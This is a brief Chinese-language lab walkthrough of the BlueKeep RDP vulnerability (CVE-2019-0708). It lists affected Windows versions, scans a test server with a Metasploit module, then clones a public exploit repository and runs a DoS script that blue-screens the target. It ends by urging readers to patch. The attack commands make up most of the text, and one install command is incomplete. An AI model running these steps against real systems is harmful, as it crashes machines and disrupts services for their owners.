前言:
該漏洞前段時間已經熱鬧了好一陣子了,HW期間更是使用此漏洞來進行釣魚等一系列活動,可為大家也是對此漏洞的關心程度,接下里就簡單的演示下利用此漏洞進行DOS攻擊。當然還有RCE的操作,這只演示下藍屏DOS操作。
漏洞影響的操作系統:
- Windows 2003
- Windows XP
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows Server 2008 R2
實驗環境:
parrot linux:10.10.202.8/24
Windows server 2008 R2: 10.10.202.9/24
首先進行掃描,此漏洞的前提開啟3389遠程桌面。
這里使用msf進行掃描,注意msf升級到最新的msf5
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.202.9
rhosts => 10.10.202.9
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
接下來我們使用exp來進行攻擊
# git clone https://github.com/Ekultek/BlueKeep
# cd BlueKeep
# pip install -r
執行payload:
└──╼ $sudo python bluekeep_weaponized_dos.py -i 10.10.202.9
瞬間就掛了,可以看到漏洞還是很嚴重的,請各位還是盡快的打補丁吧!